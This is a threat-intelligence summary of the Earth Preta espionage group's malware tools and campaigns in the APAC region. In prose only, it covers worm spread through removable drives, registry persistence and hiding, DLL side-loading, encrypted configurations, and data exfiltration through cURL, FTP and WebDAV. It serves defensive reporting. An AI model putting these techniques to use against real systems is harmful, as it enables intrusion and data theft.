Earth Preta has enhanced its attack arsenal, utilizing PUBLOAD via HIUPAN, FDMTP, and PTSOCKET for expanded control and data exfiltration.
Spear-phishing campaigns with multi-stage downloaders like DOWNBAIT and PULLBAIT have facilitated further malware deployments, as the threat group’s highly targeted attacks in the APAC region often involve rapid deployment and data exfiltration against specific countries and sectors.
It used a worm to introduce a backdoor into target networks via removable drives, which was used to execute various tools for data collection and exfiltration, while additional tools were introduced to provide alternative control and exfiltration options.
Earth Preta’s HIUPAN variant, now spreading PUBLOAD via removable drives, is easier to configure than previous versions, which use an external config file to set propagation and watchdog parameters. A decimal value in the config determines the watchdog’s sleep time, while a list of filenames specifies files to spread with HIUPAN.
HIUPAN installs itself and associated files in a specific directory, creates an autorun registry entry, and modifies registry settings to hide itself and its malware, which checks these registry settings periodically to maintain its hidden state.
It periodically checks for removable drives and propagates itself to them, creating a hidden storage directory, placing copies of its files, and also ensuring the PUBLOAD process is running, launching it if necessary.
PUBLOAD, like previously documented variants, gathers system information to map the network and achieves persistence through autorun and scheduled tasks while using various network commands and WMIC to discover network devices, running processes, and local security software.
FDMTP, a new malware downloader, is embedded in a DLL and launched via DLL side-loading. To evade detection, its network configurations are encoded and encrypted using Base64 and DES.
PUBLOAD collects sensitive data using RAR and exfiltrates it using cURL or PTSOCKET. RAR is used to archive target files, and cURL uploads the archives to an attacker-controlled FTP server, while PTSOCKET, a customized file transfer tool, can also be used for exfiltration.
The Earth Preta spear-phishing campaign leverages a .url attachment to deliver the DOWNBAIT downloader, which decrypts and executes a decoy document, and the PULLBAIT shellcode, which downloads and executes CBROVER, the first-stage backdoor, from an attacker-controlled webdav server.
According to Trend Micro, the attackers initially deployed CBROVER and then used it to deploy the first-stage PLUGX components, which were used to load the second-stage PLUGX components, and encrypted using RC4 and DPAPI.
The first-stage PLUGX components were also used to deploy a file collector, FILESAC, which was used to collect victim’s files. The attackers used two methods to collect sensitive documents from targeted victims: RAR and FILESAC.
Collected documents were then exfiltrated to a cloud storage service using a tool that leveraged Microsoft’s identity platform for authentication, which was hosted on a WebDAV server that also contained decoy documents and other malware.